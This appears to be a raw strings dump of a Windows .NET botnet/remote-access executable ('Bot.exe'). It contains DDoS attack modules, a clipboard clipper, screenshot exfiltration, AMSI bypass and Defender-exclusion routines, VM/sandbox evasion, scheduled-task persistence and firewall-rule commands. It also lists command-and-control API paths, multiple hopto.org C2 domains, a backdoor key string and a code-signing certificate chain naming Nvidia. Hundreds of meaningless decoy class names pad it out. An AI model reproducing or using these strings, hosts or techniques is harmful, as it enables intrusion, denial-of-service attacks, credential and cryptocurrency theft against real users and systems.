!This program cannot be run in DOS mode.
`.rsrc
@.reloc
@j[ 2j
v4.0.30319
#Strings
<>9__0_0
<InitializeTypeWithArgs>b__0_0
<>9__2_0
<InvokeMethodOnObject>b__2_0
<>9__3_0
<Start>b__3_0
<>c__DisplayClass4_0
<>c__DisplayClass6_0
<>c__DisplayClass7_0
<Start>b__0
<GetText>b__0
<SetText>b__0
<>u__1
IEnumerable`1
Task`1
AsyncTaskMethodBuilder`1
TaskAwaiter`1
List`1
IsRunningInVirtualMachine1
isVM_by_wim_temper1
__StaticArrayInitTypeSize=12
kernel32
Microsoft.Win32
ToInt32
<client>5__2
<>u__2
Func`2
IsRunningInVirtualMachine2
X509Certificate2
<form>5__3
Base64
SHA256
<Upload>d__6
<SendPostRequest>d__7
get_UTF8
<Module>
<PrivateImplementationDetails>
42FC44596E89DA5AE6D4D3E3F99803B92713C413F3B56B0F59C5CC4E681E362C
0C50C67E839472CD612D6033109F5E032987E48E367247F29C0EB30A1D3EB5FC
DDosARME
get_ASCII
System.IO
IsWindowsXP
Bot.AntiAV
AsmiAndETW
DownloadData
OpenWeb
mscorlib
set_Verb
System.Collections.Generic
ReadAsStringAsync
PostAsync
TasksId
Thread
Download
Upload
Notepad
get_IsAttached
Enabled
get_Connected
EnvironmentDetected
AwaitUnsafeOnCompleted
get_IsCompleted
Append
InvokeMethod
GetMethod
DDosPingFlood
Clipboard
Replace
CreateInstance
EnsureSuccessStatusCode
FileMode
SelectMode
Decode
Encode
HttpResponseMessage
Privelege
Invoke
Enumerable
IDisposable
ToDouble
RuntimeFieldHandle
Rectangle
HiddenFile
CopyFile
IsInRole
WindowsBuiltInRole
AddAccessRule
RemoveAccessRule
FileSystemAccessRule
hModule
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
procName
methodName
get_FileName
set_FileName
GetFileName
fileName
get_MachineName
get_FullName
get_UserDomainName
get_UserName
GetDirectoryName
filename
System.Net.Mime
Combine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
SecurityProtocolType
AccessControlType
controlType
GetType
SocketType
set_ContentType
System.Core
MethodBase
Dispose
X509Certificate
certificate
Update
Create
Generate
SetApartmentState
<>1__state
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AsyncStateMachineAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
returnValue
MediaTypeHeaderValue
GetValue
SetValue
set_Expect100Continue
Remove
Bot.exe
get_Size
get_TotalSize
dwSize
Logoff
Config
get_Png
System.Threading
Encoding
System.Drawing.Imaging
set_Blocking
Naming
System.Runtime.Versioning
FromBase64String
base64String
DownloadString
UploadString
typeString
GetTypeFromString
ToString
GetString
System.Drawing
set_ErrorDialog
GetPatch
GetSha256Hash
ComputeHash
sourceFilePath
destinationFilePath
WatchDogPath
NonAdminPath
GetFolderPath
AssemblyPath
get_Width
get_Length
SetLength
StartsWith
RemoteCertificateValidationCallback
set_ServerCertificateValidationCallback
TaskCheck
ProccessorCheck
Unlock
ItsRobertOrFrank
get_Task
DeletingTask
Marshal
System.Security.Principal
WindowsPrincipal
AntiVirtual
Install
DDosHttpNull
set_SecurityProtocol
System.Security.AccessControl
GetAccessControl
SetAccessControl
MutexControl
set_Ttl
FileStream
NetworkStream
MemoryStream
Program
NamingAdm
get_Item
set_Item
get_Is64BitOperatingSystem
HashAlgorithm
Random
Boolean
SecrityHidden
CopyFromScreen
get_PrimaryScreen
X509Chain
GetIpDomain
AppDomain
get_CurrentDomain
LoadPlugin
GetFileNameWithoutExtension
get_OSVersion
get_Version
GetWindowsVersion
version
WindowsDefenderExclusion
System.Security.Authentication
System.Net.NetworkInformation
Interaction
System.Reflection
ManagementObjectCollection
Bot.Function
AuthenticationException
FormatException
SetException
ArgumentException
HttpRequestException
DownloadRun
Shutdown
SendTo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
ConstructorInfo
ProcessStartInfo
DirectoryInfo
Bitmap
DDosTcp
DDosUdp
currentApp
System.Net.Http
System.Linq
IndirectObjectLoader
StringBuilder
<>t__builder
SpecialFolder
sender
buffer
ServicePointManager
CheckDebugger
ManagementObjectSearcher
identifier
DDosControler
Bot.Helper
isVM_by_wim_temper
Clipper
CurrentUser
Browser
GetAwaiter
CommandCenter
ToLower
get_Major
get_Minor
ManagementObjectEnumerator
GetEnumerator
HwidGenerator
Activator
.cctor
GetConstructor
UIntPtr
ByteToStr
libstr
methodstr
Graphics
System.Diagnostics
Threads
get_Bounds
Methods
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
DebuggingModes
GetAssemblies
MediaTypeNames
GetHostAddresses
System.Security.Cryptography.X509Certificates
set_Attributes
FileAttributes
fileBytes
GetBytes
NextBytes
SocketFlags
InitializeTypeWithArgs
DDosCondis
DDosSlowLoris
System.Threading.Tasks
Schtasks
Equals
System.Windows.Forms
Contains
System.Text.RegularExpressions
InvokeMethodOptions
PingOptions
ExplorerOptions
DDosHttpPps
get_Chars
System.Net.Http.Headers
get_Headers
HttpContentHeaders
RuntimeHelpers
GetMethodParameters
SslPolicyErrors
sslPolicyErrors
wmiClass
ManagementClass
Bypass
FileAccess
get_Success
GetCurrentProcess
IPAddress
GetProcAddress
lpAddress
System.Net.Sockets
FileSystemRights
rights
set_Arguments
Exists
Concat
ImageFormat
ManagementBaseObject
InvokeMethodOnObject
ManagementObject
Select
DDosTCPConnect
lpflOldProtect
VirtualProtect
flNewProtect
DDosHttpGet
TextGet
System.Net
TextSet
Socket
get_Height
op_Explicit
set_DefaultConnectionLimit
CheckOrExit
get_Result
DialogResult
GetResult
SetResult
WebClient
HttpClient
System.Management
set_DontFragment
Environment
get_Current
GetCurrent
get_Content
MultipartFormDataContent
StringContent
HttpContent
ByteArrayContent
IPEndPoint
get_Count
get_ProcessorCount
account
ScreenShot
ThreadStart
Restart
Convert
SendPostRequest
AxHost
DDosHttpPost
MoveNext
System.Text
GetText
SetText
createdNew
set_CreateNoWindow
CreateMutex
MessageBox
Messagebox
InitializeArray
taskArray
ToArray
CreateSubKey
OpenSubKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
PingReply
LoadLibrary
get_Directory
Registry
op_Equality
op_Inequality
System.Net.Security
AddFileSecurity
RemoveFileSecurity
FileSystemSecurity
WindowsIdentity
IsNullOrEmpty
wmiProperty
vnswFuljdBFcDkwU
MVukchLzEqVZNefY
SmxTMzMlzhCORybe
GlucoseMaintenance
HydrationMaintenance
StepMaintenance
MoodFinance
CookingFinance
ApplicationFinance
WorkHourFinance
RecipeInsurance
PersonalInsurance
HydrationInsurance
PortfolioInsurance
CalculatorInsurance
NewsInsurance
StudyInsurance
JobGuide
MileageGuide
LanguageGuide
CalorieGuide
HomeGuide
RecipeGuide
MeetingGuide
TaskGuide
PersonalGuide
TravelGuide
VideoGuide
ManagerGuide
SchedulerGuide
KeeperGuide
BoosterGuide
OrganizerGuide
GeneratorGuide
PetGuide
TaxGuide
PropertyGuide
MindCollage
BloodCollage
HomeCollage
MovingCollage
StressCollage
EventCollage
FileName
ProtocolType
BloodCare
MentalCare
PrescriptionCare
PhotoCare
MonitorCare
HeartCare
WorkoutCare
RecipeExpense
ExpenseExpense
MovingExpense
SymptomExpense
ProjectExpense
TherapyExpense
ApartmentState
String
MoodLog
InvoiceLog
ExpenseLog
RoommateLog
MeetingLog
PersonalLog
TravelLog
NutritionLog
TrackerLog
ControllerLog
SchedulerLog
TimerLog
ReporterLog
BoosterLog
HabitLog
ClientLog
BodyLog
JobCoach
VoiceCoach
PhotoCoach
AppCoach
ContractCoach
ClientCoach
HouseholdJournal
GradeJournal
RecipeJournal
TravelJournal
PlannerJournal
PetJournal
DietJournal
MusicTool
MoodMappingTool
HomeMappingTool
ToolMappingTool
PhotoMappingTool
MakerMappingTool
TimerMappingTool
WaterMappingTool
ClientMappingTool
BookTool
SleepTool
ConverterTool
GeneratorTool
NewsTool
DietTool
EventTool
TaxTool
Stream
OperatingSystem
Screen
Version
Exception
JobApp
FoodApp
MoodApp
LanguageApp
FitnessChallengeApp
GameApp
HomeApp
RecipeApp
ExpenseApp
GlucoseApp
RealEstateApp
MileageFormingApp
FitnessChallengeFormingApp
RecipeFormingApp
GlucoseFormingApp
SocialFormingApp
MealPrepFormingApp
ManagerFormingApp
WorkoutFormingApp
RunningApp
HealthApp
WorkApp
TaskApp
MentalApp
TravelApp
SymptomApp
MedicationApp
ApplicationApp
MeditationApp
NutritionApp
PrescriptionApp
SleepApp
AppApp
CarApp
ReminderApp
WeatherApp
TrackerApp
TimerApp
ReporterApp
OrganizerApp
CalculatorApp
InstructorApp
MonitorApp
WorkHourApp
WeightApp
VaultApp
AssistantApp
FamilyApp
SummaryApp
PropertyApp
MoodRadar
FreelanceRadar
CalorieRadar
RecipeRadar
GlucoseRadar
FinderRadar
OrganizerRadar
AssistantRadar
ClientRadar
WorkoutRadar
HouseholdFinder
RoommateFinder
PrescriptionFinder
AppFinder
ManagerFinder
TimerFinder
InstructorFinder
ContractFinder
WeightFinder
ClientFinder
EventFinder
FreelanceReminder
GradeReminder
GameReminder
TravelReminder
ReminderReminder
TrackerReminder
PlannerReminder
WeightReminder
TenantReminder
EventReminder
StudyReminder
SummaryReminder
YogaManager
MusicManager
InvoiceManager
GameManager
RecipeManager
ExpenseManager
RealEstateManager
NoteManager
CyclingManager
PersonalTrainingManager
MeetingManager
HealthManager
SocialManager
TravelManager
MedicationManager
MeditationManager
NutritionManager
VideoManager
SleepManager
MealPrepManager
StepManager
AppManager
LoggerManager
TrackerManager
PlannerManager
ConverterManager
BoosterManager
OrganizerManager
GeneratorManager
InstructorManager
ClassManager
FitnessManager
ContractManager
ProjectManager
PetManager
DietManager
WeightManager
HabitManager
VaultManager
TenantManager
AssistantManager
HouseholdLogger
FoodLogger
GuideLogger
FitnessChallengeLogger
CalorieLogger
RecipeLogger
NoteLogger
PersonalTrainingLogger
HealthLogger
MedicationLogger
MeditationLogger
PhotoLogger
SleepLogger
AnalyzerLogger
CalculatorLogger
ClassLogger
FitnessLogger
NewsLogger
ContractLogger
ClientLogger
EventLogger
SmartLogger
StudyLogger
Debugger
RecipeMaker
ExpenseMaker
MentalMaker
WaterMaker
HabitMaker
GroceryMaker
YogaTracker
JobTracker
MusicTracker
HouseholdTracker
FoodTracker
MoodTracker
BloodTracker
InvoiceTracker
FreelanceTracker
GradeTracker
GuideTracker
MileageTracker
LanguageTracker
FitnessChallengeTracker
CalorieTracker
GameTracker
HomeTracker
RecipeTracker
ChoreTracker
ExpenseTracker
GlucoseTracker
RoommateTracker
RealEstateTracker
NoteTracker
CookingTracker
CyclingTracker
PersonalTrainingTracker
RunningTracker
MovingTracker
WorkTracker
MedicalTracker
MealTracker
SocialTracker
PersonalTracker
TravelTracker
ToolTracker
GameApplicationTracker
MeetingApplicationTracker
MovingApplicationTracker
MakerApplicationTracker
SmartApplicationTracker
GroceryApplicationTracker
HydrationTracker
MeditationTracker
PrescriptionTracker
VideoTracker
PortfolioTracker
PhotoTracker
SleepTracker
MealPrepTracker
AppTracker
CarTracker
FinderTracker
ReminderTracker
ManagerTracker
LoggerTracker
WeatherTracker
TrackerTracker
ControllerTracker
SchedulerTracker
PlannerTracker
ReporterTracker
BoosterTracker
OrganizerTracker
AnalyzerTracker
GeneratorTracker
DoctorTracker
MonitorTracker
WorkHourTracker
ClassTracker
FitnessTracker
StressTracker
NewsTracker
ContractTracker
ProjectTracker
PetTracker
DietTracker
WeightTracker
HabitTracker
VaultTracker
AssistantTracker
IngredientTracker
ClientTracker
MusicMeasurementTracker
GradeMeasurementTracker
ChoreMeasurementTracker
MedicalMeasurementTracker
SocialMeasurementTracker
ToolMeasurementTracker
ConverterMeasurementTracker
WorkHourMeasurementTracker
IngredientMeasurementTracker
AssignmentTracker
EventTracker
SmartTracker
PodcastTracker
WorkoutTracker
TaxTracker
BodyTracker
StudyTracker
GroceryTracker
PropertyTracker
GuideChecker
CyclingChecker
PersonalChecker
MentalChecker
OrganizerChecker
GeneratorChecker
InstructorChecker
MonitorChecker
EventChecker
FamilyChecker
LanguageController
FitnessChallengeController
HydrationController
SchedulerController
PlannerController
AnalyzerController
MonitorController
ClassController
ContractController
PetController
TenantController
IngredientController
WorkoutController
TaxController
YogaScheduler
MileageScheduler
GameScheduler
GlucoseScheduler
HealthScheduler
TaskScheduler
ToolScheduler
MedicationScheduler
ApplicationScheduler
VideoScheduler
SleepScheduler
AppScheduler
CarScheduler
SchedulerScheduler
CalculatorScheduler
NewsScheduler
AssistantScheduler
IngredientScheduler
EventScheduler
HeartScheduler
TaxScheduler
PropertyScheduler
JobTimer
MindTimer
FlashcardTimer
FreelanceTimer
GameTimer
GlucoseTimer
MovingTimer
ApplicationTimer
VideoTimer
SleepTimer
StepTimer
CarTimer
ReporterTimer
CalculatorTimer
IngredientTimer
EventTimer
HeartTimer
VoiceScanner
GradeScanner
RecipeScanner
CookingScanner
PersonalTrainingScanner
SchedulerScanner
ConverterScanner
ReporterScanner
DoctorScanner
HeartScanner
FamilyScanner
FoodPlanner
FlashcardPlanner
FreelancePlanner
GuidePlanner
LanguagePlanner
GamePlanner
RealEstatePlanner
NotePlanner
CookingPlanner
PersonalTrainingPlanner
BookPlanner
WorkPlanner
MealPlanner
PersonalPlanner
ToolPlanner
MedicationPlanner
ApplicationPlanner
HydrationPlanner
MeditationPlanner
NutritionPlanner
MakerPlanner
SchedulerPlanner
KeeperPlanner
ConverterPlanner
ReporterPlanner
DoctorPlanner
MonitorPlanner
FitnessPlanner
ContractPlanner
ProjectPlanner
WeightPlanner
TenantPlanner
ClientPlanner
EventPlanner
PodcastPlanner
TaxPlanner
BodyPlanner
StudyPlanner
PropertyPlanner
InvoiceKeeper
CookingKeeper
PrescriptionKeeper
PlannerKeeper
ConverterKeeper
AnalyzerKeeper
VaultKeeper
EventKeeper
FitnessChallengeCounter
HomeCounter
MovingCounter
MentalCounter
SymptomCounter
LoggerCounter
PlannerCounter
ConverterCounter
AnalyzerCounter
FitnessCounter
EventCounter
HeartCounter
StudyCounter
LanguageConverter
SocialConverter
AppConverter
ManagerConverter
WaterConverter
ReporterConverter
AnalyzerConverter
HabitConverter
VaultConverter
IngredientConverter
GradeReporter
MovingReporter
ControllerReporter
VaultReporter
SmartReporter
TherapyReporter
HomeBooster
RecipeBooster
GlucoseBooster
PersonalBooster
TravelBooster
SleepBooster
AppBooster
ControllerBooster
BoosterBooster
GeneratorBooster
MonitorBooster
MindfulnessBooster
NewsBooster
ProjectBooster
ClientBooster
AssignmentBooster
BookSaver
ApplicationSaver
VideoSaver
KeeperSaver
GeneratorSaver
WorkHourSaver
BodySaver
JobMixer
MindMixer
RoommateMixer
PersonalTrainingMixer
ToolMixer
SchedulerMixer
BoosterMixer
GeneratorMixer
HouseholdAnalyzer
BloodAnalyzer
GameAnalyzer
RecipeAnalyzer
RunningAnalyzer
MeetingAnalyzer
HealthAnalyzer
SocialAnalyzer
PrescriptionAnalyzer
PhotoAnalyzer
AppAnalyzer
SchedulerAnalyzer
PlannerAnalyzer
ConverterAnalyzer
OrganizerAnalyzer
AnalyzerAnalyzer
DoctorAnalyzer
ClientAnalyzer
WorkoutAnalyzer
TaxAnalyzer
BodyAnalyzer
SummaryAnalyzer
HouseholdCreator
HomeCreator
CyclingCreator
HealthCreator
JobTranslator
TrackerTranslator
ClassTranslator
TenantTranslator
EventTranslator
HeartTranslator
SmartTranslator
MindCalculator
BloodCalculator
LanguageCalculator
FitnessChallengeCalculator
HomeCalculator
ChoreCalculator
ExpenseCalculator
GlucoseCalculator
RoommateCalculator
RealEstateCalculator
CookingCalculator
ToolCalculator
SleepCalculator
MealPrepCalculator
StepCalculator
FinderCalculator
ManagerCalculator
LoggerCalculator
TrackerCalculator
PlannerCalculator
KeeperCalculator
WaterCalculator
AnalyzerCalculator
StressCalculator
ClientCalculator
EventCalculator
SmartCalculator
StudyCalculator
TherapyCalculator
MindGenerator
VoiceGenerator
HomeGenerator
RecipeGenerator
RoommateGenerator
RealEstateGenerator
TaskGenerator
MealGenerator
SocialGenerator
MealPrepGenerator
CarGenerator
TimerGenerator
ConverterGenerator
WorkHourGenerator
FitnessGenerator
ClientGenerator
SmartGenerator
PodcastGenerator
SummaryGenerator
ReminderInstructor
StressInstructor
DietInstructor
AssistantInstructor
ClientInstructor
SummaryInstructor
GradeMonitor
GuideMonitor
HomeMonitor
RecipeMonitor
GlucoseMonitor
RealEstateMonitor
CookingMonitor
BookMonitor
WorkMonitor
TaskMonitor
MealMonitor
SymptomMonitor
ApplicationMonitor
HydrationMonitor
VideoMonitor
SleepMonitor
ReminderMonitor
MakerMonitor
SchedulerMonitor
TimerMonitor
MonitorMonitor
IntPtr
RoommateSubstitutes
HydrationSubstitutes
PortfolioSubstitutes
CarSubstitutes
AnalyzerSubstitutes
Process
Arguments
Object
Connect
JobAssistant
BloodAssistant
InvoiceAssistant
FreelanceAssistant
HomeAssistant
RecipeAssistant
CookingAssistant
PersonalTrainingAssistant
RunningAssistant
WorkAssistant
TaskAssistant
SocialAssistant
SymptomAssistant
VideoAssistant
MealPrepAssistant
WeatherAssistant
MakerAssistant
TrackerAssistant
PlannerAssistant
ConverterAssistant
ReporterAssistant
GeneratorAssistant
MonitorAssistant
ClassAssistant
MindfulnessAssistant
ProjectAssistant
PetAssistant
ClientAssistant
HeartAssistant
TaxAssistant
FamilyAssistant
SummaryAssistant
YogaAppointment
FoodAppointment
RecipeAppointment
NoteAppointment
ProjectAppointment
ClientAppointment
EndPoint
oNXNdtpQtbUYXcVy
BookDiary
WorkDiary
MealPrepDiary
ReminderDiary
MakerDiary
ReporterDiary
ProjectDiary
MindSummary
GuideSummary
HealthSummary
ApplicationSummary
TimerSummary
DoctorSummary
ClassSummary
MindfulnessSummary
GrocerySummary
Directory
GradeInventory
RecipeInventory
CyclingInventory
AppInventory
WeatherInventory
MonitorInventory
ClientInventory
TherapyInventory
GroceryInventory
VoiceSecurity
MileageSecurity
FileSecurity
MealSecurity
TrackerSecurity
MonitorSecurity
HabitSecurity
TherapySecurity
SummarySecurity
WrapNonExceptionThrows
2021
443.424.100.12
.NETFramework,Version=v4.6.2
FrameworkDisplayName
.NET Framework 4.6.2#
Bot.Helper.Client+<Upload>d__6
'Bot.Helper.Client+<SendPostRequest>d__7
aBot.Helper.Client+<Upload>d__6, Bot, Version=443.424.100.12, Culture=neutral, PublicKeyToken=null
jBot.Helper.Client+<SendPostRequest>d__7, Bot, Version=443.424.100.12, Culture=neutral, PublicKeyToken=null
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
210429000000Z
360428235959Z0i1
DigiCert, Inc.1A0?
8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10
[K]taM?
SA|X=G
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
jj@0HK4
DigiCert, Inc.1A0?
8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10
220226000000Z
230301235959Z0
California1
Santa Clara1
Nvidia Corporation1
IT-MIS1
Nvidia Corporation0
Mhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Mhttp://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0>
http://www.digicert.com/CPS0
http://ocsp.digicert.com0\
Phttp://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
DigiCert, Inc.1A0?
8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1
20230127173721Z0
Ontario1
Ottawa1
Entrust, Inc.1+0)
"Entrust Timestamp Authority - TSA1
Entrust.net1@0>
7www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)1%0#
(c) 1999 Entrust.net Limited1301
*Entrust.net Certification Authority (2048)0
991224175051Z
290724141512Z0
Entrust.net1@0>
7www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)1%0#
(c) 1999 Entrust.net Limited1301
*Entrust.net Certification Authority (2048)0
Entrust.net1@0>
7www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)1%0#
(c) 1999 Entrust.net Limited1301
*Entrust.net Certification Authority (2048)0
150722190254Z
290622193254Z0
Entrust, Inc.1(0&
See www.entrust.net/legal-terms1907
0(c) 2015 Entrust, Inc. - for authorized use only1&0$
Entrust Timestamping CA - TS10
T=A^C_(F
http://www.entrust.net/rpa03
http://ocsp.entrust.net02
!http://crl.entrust.net/2048ca.crl0
Entrust, Inc.1(0&
See www.entrust.net/legal-terms1907
0(c) 2015 Entrust, Inc. - for authorized use only1&0$
Entrust Timestamping CA - TS10
221004172103Z
290101000000Z0u1
Ontario1
Ottawa1
Entrust, Inc.1+0)
"Entrust Timestamp Authority - TSA10
_Xg>gX
http://ocsp.entrust.net03
'http://aia.entrust.net/ts1-chain256.cer01
http://crl.entrust.net/ts1ca.crl0
https://www.entrust.net/rpa0
Entrust, Inc.1(0&
See www.entrust.net/legal-terms1907
0(c) 2015 Entrust, Inc. - for authorized use only1&0$
Entrust Timestamping CA - TS1
230127173721Z0)
Entrust, Inc.1(0&
See www.entrust.net/legal-terms1907
0(c) 2015 Entrust, Inc. - for authorized use only1&0$
Entrust Timestamping CA - TS1
~0Rgser
!"#$%&'()*+,-./0123456789:;?CFJKMOPQRSTUVWXYZ[\]^_`adefghiklmopqrstuvwy|}~
<=>@ABDEGHILNbcjnxz{
DDosSlowLoris
DDosPingFlood
DDosHttpGet
DDosHttpPps
DDosHttpPost
DDosHttpNull
DDosARME
DDosStop
DDosCondis
DDosTCP
DDosUDP
DDosTCPConnect
http://
https://
System.Net.Sockets.Socket
GET / HTTP/1.1
GET / HTTP/1.1
Host:
User-Agent: null
Referrer: null
POST / HTTP/1.1
Host:
Content-length: 5235
System.Net.WebClient
Paradox Net
HEAD / HTTP/1.1
Host:
System.IO.Path
GetTempFileName
System.IO.File
WriteAllBytes
start /b powershell
ExecutionPolicy Bypass Start-Process -FilePath '"
"' & exit
System.Diagnostics.ProcessStartInfo
System.Diagnostics.Process
WriteAllText
System.Drawing.Bitmap
System.Drawing.Graphics
FromImage
Shutdown /s /f /t 00
Shutdown /l /f
Shutdown /r /f /t 00
Could not find constructor matching provided arguments array
No appropriate Method matching name with arguments could be found.
System.Management.ManagementObjectSearcher
root\Microsoft\Windows\Defender
SELECT * FROM MSFT_MpPreference
ComputerID
MSFT_MpPreference.ComputerID='
System.Management.ManagementObject
ExclusionPath
C:\Windows\System32\amsi.dll
amsi.dll
AmsiScanBuffer
Select * From Win32_ComputerSystem
TotalPhysicalMemory
drivers
balloon.sys
netkvm.sys
pvpanic.sys
viofs.sys
viogpudo.sys
vioinput.sys
viorng.sys
vioser.sys
viostor.sys
qemu-ga
SPICE Guest Tools
sandbox
Select * from Win32_CacheMemory
Select * from CIM_Memory
Robert
DESKTOP
System.Convert
FromBase64String
ToBase64String
/api/v1/ping.php
hwidnotfound
/api/v1/connect.php
/api/v1/task_run.php
MessageBox
Screenshot
PcShutdown
Notepad
ClipperStart
ExecuteShell
ClientUpdate
ClientRemove
ClipperStop
ExecuteLink
ExecuteDisk
ClientClose
OpenWebBrowser
OpenWebHidden
ClientRestart
ExecutePowershell
PcReboot
PcLogout
/api/v1/screen_upload.php
/uploads/Files/
powershell
Plugin
/uploads/Plugins/
/api/v1/task_failed.php
MIIDdzCCAl+gAwIBAgIUUCyodkkeLJvcyGwL16uT4
VReL7swDQYJKoZIhvcNAQELBQAwSzELMAkGA1UEBhMCRVUxEzA
RBgNVBAgMClNvbWUtU3RhdGUxEzARBgNVBAoMCk15IENvbXBhbnkxEjAQBgNVBAMMCWxvY2
FsaG9zdDAeFw0yNDEwMDcyMzIyMTBaFw0yODA3MDMyMz
IyMTBaMEsxCzAJBgNVBAYTAkVVMRMwEQYDVQ
QIDApTb21lLVN0YXRlMRMwEQYDVQQKDApNeSBDb21wYW55MRIwEAY
DVQQDDAlsb2NhbGhvc3QwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwg
gEKAoIBAQD1uaw5zWoLhkv1o35LzeVR7L7MSnTA2Xz
MKZsUHc5LZDaoUQpEGg8eCQnwuYs8V8KlqFps29azefzF
jweeB4JPwjTDL5cOBuzhniRk3EIIntUnB/SCgCIMcFEiePuIK29T2JA2t
iFd6PscIuu+gAl6eDFZke0uGULL1+l7UbOlYwnoNCD+vrG0bIeCLzz+
7ARVrsMlEdc/sWCcRb+iZQkqUWfMvgN8tItPjY8vG1Cq3+II6hrTy1DvXl4aKxR7HC4vf3f4ELkdFBpygG
B5603F+yCObyP26w0kOVdaJzI0aIz7BHG+ZLisS/PbwlTuHbNJ9U6
xfD1owN94LziZ2yGBAgMBAAGjUzBRMB0GA1UdDgQWBBSMu7lAJgo02R
OFY2xc5xfX8FviojAfBgNVHSMEGDAWgBSMu7lAJgo02ROFY2xc5xfX8FviojAPBgNVHRMBAf8EBT
ADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQDzB69MpWNRvyzmqOaHZc1+kjgbk
TOkOFs+WeDzy6qUxwkdYcZP4POabOpPSABk+u28/eHWrRBdwFyuNyTm6J5Rg8wI
tSF9V2homCg7GoyUmiZlKAbZCdK9ily3m0wsSGONfjVgzZPr7cjOzmGByhmm2GR
hUNcj/seCLYpK5h63LPyG2rxXC8dTU3x4Z3hGLMvqNe
05D5rU+GF1tJoreRp8gx568bZ7nagSeAqcjrNjF7pzw5
heiCYiNB+Hsf1sdwUkQK2owFSEYEDgo7piZqKcI/C
AhGSQev39i4+L8g2ASrKopkjJS1Vu4
wKWqbItsFZ5q/eRGvWk+5bLgs1oGvBt
https://fdute32sdajfsda.hopto.org
https://dtte48ksk8ds5.hopto.org
https://udtte45k8ds5.hopto.org
https://kigjfkdstte405.hopto.org
https://uiojkps98hjbds405.hopto.org
https://8n7tgfdsn87dsfu9n.hopto.org
https://67b8nd9smfu0n8b7ds.hopto.org
backdoor
vyub75665ANKiuf78
C:\Users\
\AppData\Local\CrashDumps\Crash.exe
C:\Windows\Performance\WinSAT\issas.exe
\AppData\Roaming\Microsoft\HTML Help\unsecapp.exe
Google
System.Management.ManagementClass
Win32_DiskDrive
Win32_Processor
Win32_BIOS
SerialNumber
Win32_BaseBoard
ProcessorId
Exists
System.IO.Directory
CreateDirectory
Microsoft Web Edge
Microsoft\Windows\
timeout 5 > NUL
/f /q
System.IO.FileStream
netsh advfirewall firewall add rule name="
" dir=in action=allow program="
" enable=yes & exit
Combine
schtasks /deleTe /F /Tn "
" & exit
schtasks /create /f /sc minute /mo
/tn "
" /tr "
/RL HIGHEST
& exit
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Hidden
HideFileExt
SELECT * FROM Win32_OperatingSystem
Caption
windows 11
Windows 11
windows 10
Windows 10
windows 8.1
Windows 8.1
windows 8
Windows 8
windows 7
Windows 7
windows server
Windows svr
TrustedInsraller
System
System.Net.Http.HttpClient
application/x-www-form-urlencoded
application/zip
filename
FlashcardAnalyzer
DoctorFormingApp
FamilyAnalyzer
GeneratorManager
ExpenseRadar
StepApp
ChoreSummary
VideoTracker
DoctorPlanner
BookAnalyzer
ReporterFinder
TimerManager
InstructorAnalyzer
MindfulnessTimer
TaskPlanner
TaskCalculator
GeneratorTracker
IngredientCounter
MeditationGuide
MeditationPlanner
HomeAnalyzer
JobManager
TravelSaver
TrackerTracker
FinderApplicationTracker
MindInsurance
AppLog
FamilyConverter
CyclingApp
GradeCalculator
GameCollage
TherapyAssistant
PortfolioManager
WeatherBooster
FitnessChallengeTracker
AssignmentCalculator
CalculatorTracker
MusicCollage
ReminderScheduler
SymptomMappingTool
AppInstructor
ControllerManager
FamilyPlanner
IngredientMonitor
TherapyMeasurementTracker
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
443.424.100.12
InternalName
Bot.exe
LegalCopyright
2021
LegalTrademarks
OriginalFilename
Bot.exe
ProductName
ProductVersion
443.424.100.12
Assembly Version
443.424.100.12